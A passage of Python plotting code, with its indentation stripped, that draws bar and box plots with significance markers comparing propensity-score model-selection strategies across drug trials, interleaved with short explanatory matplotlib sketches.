print(r"#df['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
top_1 = df.loc[:, 'success_rate-val_auc_nsmd'] # * 100
top_1_ci = np.array(
df.loc[:, 'success_rate_ci-val_auc_nsmd'].apply(lambda x: stringlist_2_list(x)).to_list()) # *100
# top_1_ci = df.loc[:, 'success_rate_std-val_auc_nsmd']
top_2 = df.loc[:, 'success_rate-val_maxsmd_nsmd'] # * 100
top_2_ci = np.array(
df.loc[:, 'success_rate_ci-val_maxsmd_nsmd'].apply(lambda x: stringlist_2_list(x)).to_list()) # *100
# top_2_ci = df.loc[:, 'success_rate_std-val_maxsmd_nsmd']
top_3 = df.loc[:, 'success_rate-trainval_final_finalnsmd'] # * 100
top_3_ci = np.array(
df.loc[:, 'success_rate_ci-trainval_final_finalnsmd'].apply(lambda x: stringlist_2_list(x)).to_list()) # *100
# top_3_ci = df.loc[:, 'success_rate_std-trainval_final_finalnsmd']
pauc = np.array(df.loc[:, "p-succes-final-vs-auc"])
psmd = np.array(df.loc[:, "p-succes-final-vs-maxsmd"])
paucsmd = np.array(df.loc[:, "p-succes-auc-vs-maxsmd"])
xlabels = df.loc[:, 'drug_name']
# xlabels = df.loc[:, 'drug_name'].apply(lambda x : min(x.split('/'), key=str))
xlabels = [s[:18] for s in xlabels]
width = 0.3 # 0.45 # the width of the bars
ind = np.arange(N) * width * 4 # the x locations for the groups
colors = ['#FAC200', '#82A2D3', '#F65453']
fig, ax = plt.subplots(figsize=(40, 8))
error_kw = {'capsize': 3, 'capthick': 1, 'ecolor': 'black'}
# plt.ylim([0, 1.05])
rects1 = ax.bar(ind, top_1, width, yerr=[top_1 - top_1_ci[:, 0], top_1_ci[:, 1] - top_1], error_kw=error_kw,
color=colors[0], edgecolor=None) # , edgecolor='b' "black"
rects2 = ax.bar(ind + width, top_2, width, yerr=[top_2 - top_2_ci[:, 0], top_2_ci[:, 1] - top_2], error_kw=error_kw,
color=colors[1], edgecolor=None)
rects3 = ax.bar(ind + 2 * width, top_3, width, yerr=[top_3 - top_3_ci[:, 0], top_3_ci[:, 1] - top_3],
error_kw=error_kw, color=colors[2], edgecolor=None) # , hatch='.')
# rects1 = ax.bar(ind, top_1, width, yerr=[top_1_ci, top_1_ci], error_kw=error_kw,
# color='#FAC200', edgecolor="black") # , edgecolor='b'
# rects2 = ax.bar(ind + width, top_2, width, yerr=[top_2_ci, top_2_ci], error_kw=error_kw,
# color='#82A2D3', edgecolor="black")
# rects3 = ax.bar(ind + 2 * width, top_3, width, yerr=[top_3_ci, top_3_ci],
# error_kw=error_kw, color='#F65453', edgecolor="black") # , hatch='.')
ax.set_xticks(ind + width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(xlabels, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Prop. of success balancing", fontsize=25) # Success Rate of Balancing
# ax.set_title(model, fontsize=25) #fontweight="bold")
# plt.axhline(y=0.5, color='#888888', linestyle='-')
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
# def labelvalue(rects, val, height=None):
# for i, rect in enumerate(rects):
# if height is None:
# h = rect.get_height() * 1.03
# else:
# h = height[i] * 1.03
# ax.text(rect.get_x() + rect.get_width() / 2., h,
# significance(val[i]),
# ha='center', va='bottom', fontsize=11)
#
# labelvalue(rects1, pauc, top_1_ci[:,1])
# labelvalue(rects2, psmd, top_2_ci[:,1])
for i, rect in enumerate(rects3):
d = 0.02
y = top_3_ci[i, 1] * 1.03 # rect.get_height()
w = rect.get_width()
x = rect.get_x()
x1 = x - 2 * w
x2 = x - 1 * w
y1 = top_1_ci[i, 1] * 1.03
y2 = top_2_ci[i, 1] * 1.03
# auc v.s. final
l, r = x1, x + w
ax.plot([l, l, (l + r) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(l + r) / 2, r, r], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
ax.text((l + r) / 2, y + 2.6 * d, significance(pauc[i]), ha='center', va='bottom', fontsize=13)
# smd v.s. final
l, r = x2 + 0.6 * w, x + w
ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
# ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c='#82A2D3') #c="black")
ax.text((l + r) / 2, y + 0.6 * d, significance(psmd[i]), ha='center', va='bottom', fontsize=13)
# auc v.s. smd
l, r = x1, x2 + 0.4 * w
ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
# ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
ax.text((l + r) / 2, y + .6 * d, significance(paucsmd[i]), ha='center', va='bottom', fontsize=13)
# ax.set_title('Success Rate of Balancing by Different PS Model Selection Methods')
ax.legend((rects1[0], rects2[0], rects3[0]), ('Val-AUC Select', 'Val-SMD Select', 'Our Strategy'),
fontsize=25) # , bbox_to_anchor=(1.13, 1.01))
# ax.autoscale(enable=True, axis='x', tight=True)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}.pdf'.format(model, contrl_type))
plt.show()
# plt.clf()
plt.close()
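# bar_plot_model_selection stores each confidence interval as [low, high] and
# converts it into matplotlib's asymmetric yerr, which expects error-bar
# *lengths* [mean - low, high - mean]. A self-contained sketch of that
# conversion with toy values:

```python
import numpy as np
import matplotlib
matplotlib.use('Agg')  # headless backend for this sketch
import matplotlib.pyplot as plt

# Toy values: each CI row is [low, high]
means = np.array([0.6, 0.8])
ci = np.array([[0.5, 0.7], [0.7, 0.9]])
yerr = [means - ci[:, 0], ci[:, 1] - means]  # [lower lengths, upper lengths]

fig, ax = plt.subplots()
rects = ax.bar(np.arange(len(means)), means, 0.3, yerr=yerr,
               error_kw={'capsize': 3, 'capthick': 1, 'ecolor': 'black'})
plt.close(fig)
```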
def bar_plot_model_selectionV2(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}-More.xlsx'.format(model),
sheet_name=contrl_type)
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
print(r"#df['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
col = ['success_rate-val_auc_nsmd', 'success_rate-val_maxsmd_nsmd', 'success_rate-val_nsmd_nsmd',
'success_rate-train_maxsmd_nsmd', 'success_rate-train_nsmd_nsmd',
'success_rate-trainval_maxsmd_nsmd', 'success_rate-trainval_nsmd_nsmd',
'success_rate-trainval_final_finalnsmd']
legs = ['_'.join(x.split('-')[1].split('_')[:-1]) for x in col]
# col_ci = [x.replace('rate', 'rate_ci') for x in col]
top = []
top_ci = []
for c in col:
top.append(df.loc[:, c])
top_ci.append(np.array(df.loc[:, c.replace('rate', 'rate_ci')].apply(lambda x: stringlist_2_list(x)).to_list()))
pauc = np.array(df.loc[:, "p-succes-final-vs-auc"])
psmd = np.array(df.loc[:, "p-succes-final-vs-maxsmd"])
paucsmd = np.array(df.loc[:, "p-succes-auc-vs-maxsmd"])
xlabels = df.loc[:, 'drug_name']
width = 0.45 # the width of the bars
ind = np.arange(N) * width * (len(col) + 1) # the x locations for the groups
colors = ['#FAC200', '#82A2D3', '#F65453']
fig, ax = plt.subplots(figsize=(24, 8))
error_kw = {'capsize': 3, 'capthick': 1, 'ecolor': 'black'}
# plt.ylim([0, 1.05])
rects = []
for i in range(len(top)):
top_1 = top[i]
top_1_ci = top_ci[i]
if i <= 1 or i == len(top) - 1:
rect = ax.bar(ind + width * i, top_1, width, yerr=[top_1 - top_1_ci[:, 0], top_1_ci[:, 1] - top_1],
error_kw=error_kw,
color=colors[min(i, len(colors) - 1)], edgecolor=None) # "black")
else:
rect = ax.bar(ind + width * i, top_1, width, yerr=[top_1 - top_1_ci[:, 0], top_1_ci[:, 1] - top_1],
error_kw=error_kw,
edgecolor="black")
rects.append(rect)
ax.set_xticks(ind + int(len(top) / 2) * width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(xlabels, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Prop. of success balancing", fontsize=25) # Success Rate of Balancing
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
def labelvalue(rects, val, height=None):
for i, rect in enumerate(rects):
if height is None:
h = rect.get_height() * 1.02
else:
h = height[i] * 1.02
ax.text(rect.get_x() + rect.get_width() / 2., h,
significance(val[i]),
ha='center', va='bottom', fontsize=11)
for i in range(len(rects) - 1):
pv = np.array(df.loc[:, "p-succes-fvs-" + col[i].split('-')[-1]])
labelvalue(rects[i], pv, top_ci[i][:, 1])
# labelvalue(rects1, pauc, top_1_ci[:,1])
# labelvalue(rects2, psmd, top_2_ci[:,1])
# for i, rect in enumerate(rects3):
# d = 0.02
# y = top_3_ci[i, 1] * 1.03 # rect.get_height()
# w = rect.get_width()
# x = rect.get_x()
# x1 = x - 2 * w
# x2 = x - 1 * w
#
# y1 = top_1_ci[i, 1] * 1.03
# y2 = top_2_ci[i, 1] * 1.03
#
# # auc v.s. final
# l, r = x1, x + w
# ax.plot([l, l, (l+r) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(l+r) / 2, r, r], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
# ax.text((l+r) / 2, y + 2.6 * d, significance(pauc[i]), ha='center', va='bottom', fontsize=13)
#
# # smd v.s. final
# l, r = x2 + 0.6*w, x + w
# ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
# ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c='#82A2D3') #c="black")
# ax.text((l + r) / 2, y + 0.6 * d, significance(psmd[i]), ha='center', va='bottom', fontsize=13)
#
# # auc v.s. smd
# l, r = x1, x2 + 0.4*w
# ax.plot([l, l, (l + r) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(l + r) / 2, r, r], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
# # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c='#FAC200') #c="black")
# ax.text((l + r) / 2, y + .6 * d, significance(paucsmd[i]), ha='center', va='bottom', fontsize=13)
# ax.set_title('Success Rate of Balancing by Different PS Model Selection Methods')
ax.legend([rect[0] for rect in rects], legs,
fontsize=18)  # , bbox_to_anchor=(1.13, 1.01))
# ax.autoscale(enable=True, axis='x', tight=True)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}-all.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/balance_rate_barplot-{}-{}-all.pdf'.format(model, contrl_type))
plt.show()
plt.close()  # close (not just clear) the figure to free memory, matching bar_plot_model_selection
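# labelvalue above writes a significance star just above each bar (or its CI
# cap) via ax.text. A toy, self-contained sketch of the same annotation
# pattern, with the thresholds from the source's significance helper:

```python
import matplotlib
matplotlib.use('Agg')  # headless backend for this sketch
import matplotlib.pyplot as plt

def significance(val):
    # same thresholds as in the source
    return '***' if val < 0.001 else '**' if val < 0.01 else '*' if val < 0.05 else 'ns'

fig, ax = plt.subplots()
rects = ax.bar([0, 1, 2], [0.4, 0.6, 0.8], 0.3)
pvals = [0.2, 0.03, 0.0005]
labels = []
for rect, p in zip(rects, pvals):
    h = rect.get_height() * 1.02  # a little above the top of the bar
    t = ax.text(rect.get_x() + rect.get_width() / 2., h, significance(p),
                ha='center', va='bottom', fontsize=11)
    labels.append(t.get_text())
plt.close(fig)
```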
def box_plot_model_selection(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}.xlsx'.format(model),
sheet_name=contrl_type, converters={'drug': str})
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE # 0.1
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE # 0.1
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
print(r"#df['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
drug_list = df['drug']  # df is already filtered by idx; re-masking with dfall's boolean index can raise in recent pandas
drug_name_list = df['drug_name']
drug_name_list = [s[:18] for s in drug_name_list]
data_1 = []
data_2 = []
data_3 = []
data_pvalue = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if contrl_type != 'all':
idx = rdf['ctrl_type'] == contrl_type
else:
idx = rdf['ctrl_type'].notna()
data_1.append(np.array(rdf.loc[idx, "val_auc_testauc"]))
data_2.append(np.array(rdf.loc[idx, "val_maxsmd_testauc"]))
data_3.append(np.array(rdf.loc[idx, "trainval_final_testnauc"]))
p1, test_orig1 = bootstrap_mean_pvalue_2samples(data_3[-1], data_1[-1])
p2, test_orig2 = bootstrap_mean_pvalue_2samples(data_3[-1], data_2[-1])
p3, test_orig3 = bootstrap_mean_pvalue_2samples(data_1[-1], data_2[-1])
# test_orig1_man = stats.mannwhitneyu(data_3[-1], data_1[-1])
# test_orig2_man = stats.mannwhitneyu(data_3[-1], data_2[-1])
data_pvalue.append([test_orig1[1], test_orig2[1], test_orig3[1]])
colors = ['#FAC200', '#82A2D3', '#F65453']
fig, ax = plt.subplots(figsize=(45, 8)) #(18, 8)
width = 0.3 # 0.5 # the width of the bars
ind = np.arange(N) * width * 4 # the x locations for the groups
sym = 'o'
# 'meanline':True,
box_kw = {"sym": sym, "widths": width, "patch_artist": True, "notch": True,
'showmeans': True, # 'meanline':True,
"meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='purple', marker='^',
markerfacecolor="None")}
rects1 = plt.boxplot(data_1, positions=ind - 0.08, **box_kw)
rects2 = plt.boxplot(data_2, positions=ind + width, **box_kw)
rects3 = plt.boxplot(data_3, positions=ind + 2 * width + 0.08, **box_kw)
def plot_strip(ind, data, color):
w = width - 0.15
swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
columns=['x', 'y'])
strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
# sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=0.2, c=color)
# ticks = list(drug_name_list)
for i, bplot in enumerate([rects1, rects2, rects3]):
for patch in bplot['boxes']:
patch.set_facecolor(colors[i])
r, g, b, a = patch.get_facecolor()
patch.set_facecolor((r, g, b, .7))
# plt.setp(bplot['boxes'], color=color)
# plt.setp(bplot['whiskers'], color=color)
# plt.setp(bplot['caps'], color=color)
plt.setp(bplot['medians'], color='black')
plot_strip(ind - 0.08, data_1, colors[0])
plot_strip(ind + width, data_2, colors[1])
plot_strip(ind + 2 * width + 0.08, data_3, colors[2])
# plt.ylim([0.5, 0.85])
ax.set_xticks(ind + width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Test AUC", fontsize=25)
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
# def labelvalue(rects, x, y, p):
# for i, rect in enumerate(rects):
# ax.text(x[i], y[i],
# significance(p[i]),
# ha='center', va='bottom', fontsize=11)
#
# labelvalue(rects1["boxes"], ind - 0.08, np.max(data_1, axis=1)*1.01, np.array(data_pvalue)[:,0])
# labelvalue(rects2["boxes"], ind + width, np.max(data_2, axis=1)*1.01, np.array(data_pvalue)[:,1])
p_v = np.array(data_pvalue)
for i in range(N):
d = 0.008
y = np.max([data_1[i].max(), data_2[i].max(), data_3[i].max()]) * 1.01 # rect.get_height()
x = ind[i] + 2 * width + 0.08 # + width/2
x1 = ind[i] - 0.08 # - width/2
x2 = ind[i] + width # - width/2
# auc v.s. smd
l, r = x - 0.5 * width, x2 - 0.08
ax.plot([x1, x1, (x2 + x1) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(x2 + x1) / 2, x2 - 0.08, x2 - 0.08], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
ax.text((x2 + x1) / 2, y + d, significance(p_v[i, 2]), ha='center', va='bottom', fontsize=12)
# auc v.s. final
ax.plot([x1, x1, (x + x1) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
ax.plot([(x + x1) / 2, x, x], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c="black")
ax.text((x + x1) / 2, y + 3 * d, significance(p_v[i, 0]), ha='center', va='bottom', fontsize=12)
# smd v.s. final
ax.plot([x2 + 0.08, x2 + 0.08, (x + x2) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
ax.plot([(x + x2) / 2, x, x], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
# ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c="black")
ax.text((x + x2) / 2, y + 1 * d, significance(p_v[i, 1]), ha='center', va='bottom', fontsize=12)
ax.legend((rects1["boxes"][0], rects2["boxes"][0], rects3["boxes"][0]),
('Val-AUC Select', 'Val-SMD Select', 'Our Strategy'),
fontsize=20)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
check_and_mkdir(dirname + 'results/fig/')
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}.png'.format(model, contrl_type))
fig.savefig(dirname + 'results/fig/test_auc_boxplot-{}-{}.pdf'.format(model, contrl_type))
plt.show()
plt.close()  # close (not just clear) the figure to free memory
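# plot_strip overlays the raw per-trial points on each box by adding uniform
# horizontal jitter drawn with scipy, like the stats.uniform(-w/2., w) call
# above. A self-contained sketch with toy data:

```python
import numpy as np
import matplotlib
matplotlib.use('Agg')  # headless backend for this sketch
import matplotlib.pyplot as plt
from scipy import stats

half_w = 0.15  # half the jitter width, analogous to w in plot_strip
positions = np.array([0.0, 1.0])
data = [np.random.RandomState(0).rand(20), np.random.RandomState(1).rand(20)]

fig, ax = plt.subplots()
ax.boxplot(data, positions=positions, widths=0.3, patch_artist=True)
for pos, vals in zip(positions, data):
    # uniform noise on [-half_w, half_w]: loc=-half_w, scale=2*half_w
    jitter = stats.uniform(-half_w, 2 * half_w).rvs(len(vals), random_state=0)
    ax.scatter(pos + jitter, vals, alpha=0.2)
plt.close(fig)
```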
def box_plot_model_selectionV2(cohort_dir_name, model, contrl_type='random', dump=True, colorful=True):
dirname = r'output_marketscan/{}/{}/'.format(cohort_dir_name, model)
dfall = pd.read_excel(dirname + 'results/summarized_model_selection_{}-More.xlsx'.format(model),
sheet_name=contrl_type, converters={'drug': str})
idx = dfall['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE
idx_auc = dfall['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE
idx_smd = dfall['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE
print('Total drug trials: ', len(idx))
print(r"#df['success_rate-trainval_final_finalnsmd'] >= MIN_SUCCESS_RATE: ", idx.sum(), '({:.2f}%)'.format(idx.mean() * 100))
print(r"#df['success_rate-val_auc_nsmd'] >= MIN_SUCCESS_RATE: ", idx_auc.sum(), '({:.2f}%)'.format(idx_auc.mean() * 100))
print(r"#df['success_rate-val_maxsmd_nsmd'] >= MIN_SUCCESS_RATE: ", idx_smd.sum(), '({:.2f}%)'.format(idx_smd.mean() * 100))
df = dfall.loc[idx, :].sort_values(by=['success_rate-trainval_final_finalnsmd'], ascending=[False])
# df['nsmd_mean_ci-val_auc_nsmd']
N = len(df)
drug_list = df['drug']  # df is already filtered by idx; re-masking with dfall's boolean index can raise in recent pandas
drug_name_list = df['drug_name']
col = ['val_auc_testauc', 'val_maxsmd_testauc', 'val_nsmd_testauc',
'train_maxsmd_testauc', 'train_nsmd_testauc',
'trainval_maxsmd_testauc', 'trainval_nsmd_testauc',
'trainval_final_testnauc']
legs = ['_'.join(x.split('_')[:-1]) for x in col]
data_list = [[] for i in range(len(col))]
data_1 = []
data_2 = []
data_3 = []
data_pvalue = []
for drug in drug_list:
rdf = pd.read_csv(dirname + 'results/' + drug + '_model_selection.csv')
if contrl_type != 'all':
idx = rdf['ctrl_type'] == contrl_type
else:
idx = rdf['ctrl_type'].notna()
for i in range(len(col)):
data_list[i].append(np.array(rdf.loc[idx, col[i]]))
p_v = []
for i in range(1, len(col)):
a = data_list[0][-1]
b = data_list[i][-1]
p, test_orig = bootstrap_mean_pvalue_2samples(a, b)
p_v.append(test_orig[1])
data_pvalue.append(p_v)
colors = ['#FAC200', '#82A2D3', '#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#F65453']
# color_others = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b', '#e377c2', '#7f7f7f', '#bcbd22', '#17becf']
fig, ax = plt.subplots(figsize=(24, 8))
width = 0.5 # the width of the bars
ind = np.arange(N) * width * (len(col) + 1) # the x locations for the groups
sym = 'o'
# 'meanline':True,
box_kw = {"sym": sym, "widths": width - 0.08, "patch_artist": True, "notch": True,
'showmeans': True, # 'meanline':True,
"meanprops": dict(linestyle='--', linewidth=1, markeredgecolor='purple', marker='^',
markerfacecolor="None")}
rects = []
for i, data in enumerate(data_list):
rect = plt.boxplot(data, positions=ind + i * width, **box_kw)
rects.append(rect)
def plot_strip(ind, data, color=None):
w = width - 0.15
swarm1 = pd.DataFrame([(ind[i], data[i][j]) for i in range(len(ind)) for j in range(len(data[i]))],
columns=['x', 'y'])
strip_rx = stats.uniform(-w / 2., w).rvs(len(swarm1))
# sns.stripplot(x='x', y='y', data=swarm1, color=".25", alpha=0.2, ax=ax)
if color is None:
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=0.2)
else:
plt.scatter(swarm1['x'] + strip_rx, swarm1['y'], alpha=0.2, c=color)
# ticks = list(drug_name_list)
for i, bplot in enumerate(rects):
for patch in bplot['boxes']:
patch.set_facecolor(colors[i])
r, g, b, a = patch.get_facecolor()
patch.set_facecolor((r, g, b, 0.7))
# plt.setp(bplot['boxes'], color=color)
# plt.setp(bplot['whiskers'], color=color)
# plt.setp(bplot['caps'], color=color)
plt.setp(bplot['medians'], color='black')
for i, data in enumerate(data_list):
plot_strip(ind + i * width, data, colors[i])
# plt.ylim([0.5, 0.85])
ax.set_xticks(ind + int(len(col) / 2) * width)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
# ax.spines['bottom'].set_color('#DDDDDD')
ax.set_axisbelow(True)
ax.yaxis.set_minor_locator(tck.AutoMinorLocator())
ax.yaxis.grid(True, color='#EEEEEE', which='both')
ax.xaxis.grid(False)
ax.set_xticklabels(drug_name_list, fontsize=20, rotation=45, ha='right')
ax.tick_params(axis='both', which='major', labelsize=20)
ax.set_xlabel("Drug Trials", fontsize=25)
ax.set_ylabel("Test AUC", fontsize=25)
def significance(val):
if val < 0.001:
return '***'
elif val < 0.01:
return '**'
elif val < 0.05:
return '*'
else:
return 'ns'
# def labelvalue(rects, x, y, p):
# for i, rect in enumerate(rects):
# ax.text(x[i], y[i],
# significance(p[i]),
# ha='center', va='bottom', fontsize=11)
#
# labelvalue(rects1["boxes"], ind - 0.08, np.max(data_1, axis=1)*1.01, np.array(data_pvalue)[:,0])
# labelvalue(rects2["boxes"], ind + width, np.max(data_2, axis=1)*1.01, np.array(data_pvalue)[:,1])
p_v = np.array(data_pvalue)
for i in range(N):
d = 0.008
for j in range(1, len(col)):
y = data_list[j][i].max() * 1.01
x = ind[i] + j * width
ax.text(x, y + d, significance(p_v[i, j - 1]), ha='center', va='bottom', fontsize=9)
# y = np.max([data_1[i].max(), data_2[i].max(), data_3[i].max()]) * 1.01 # rect.get_height()
# x = ind[i] + 2 * width + 0.08 # + width/2
# x1 = ind[i] - 0.08 # - width/2
# x2 = ind[i] + width # - width/2
#
# # auc v.s. smd
# l, r = x - 0.5*width, x2 - 0.08
# ax.plot([x1, x1, (x2 + x1) / 2], [y, y + d, y + d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(x2 + x1) / 2, x2 - 0.08, x2-0.08], [y + d, y + d, y], lw=1.2, c=colors[1] if colorful else 'black')
# ax.text((x2 + x1) / 2, y + d, significance(p_v[i, 2]), ha='center', va='bottom', fontsize=12)
#
# # auc v.s. final
# ax.plot([x1, x1, (x + x1) / 2], [y + 2 * d, y + 3 * d, y + 3 * d], lw=1.2, c=colors[0] if colorful else 'black')
# ax.plot([(x + x1) / 2, x, x], [y + 3 * d, y + 3 * d, y + 2 * d], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x1, x1, x, x], [y+2*d, y+3*d, y+3*d, y+2*d], c="black")
# ax.text((x + x1) / 2, y + 3 * d, significance(p_v[i, 0]), ha='center', va='bottom', fontsize=12)
#
# # smd v.s. final
# ax.plot([x2+0.08, x2+0.08, (x + x2) / 2], [y, y + d, y + d], lw=1.2, c=colors[1] if colorful else 'black')
# ax.plot([(x + x2) / 2, x, x], [y + d, y + d, y], lw=1.2, c=colors[2] if colorful else 'black')
# # ax.plot([x2, x2, x, x], [y, y + d, y + d, y], c="black")
# ax.text((x + x2) / 2, y + 1 * d, significance(p_v[i, 1]), ha='center', va='bottom', fontsize=12)
ax.legend([rect["boxes"][0] for rect in rects], legs,
fontsize=15)
ax.set_xmargin(0.01)
plt.tight_layout()
if dump:
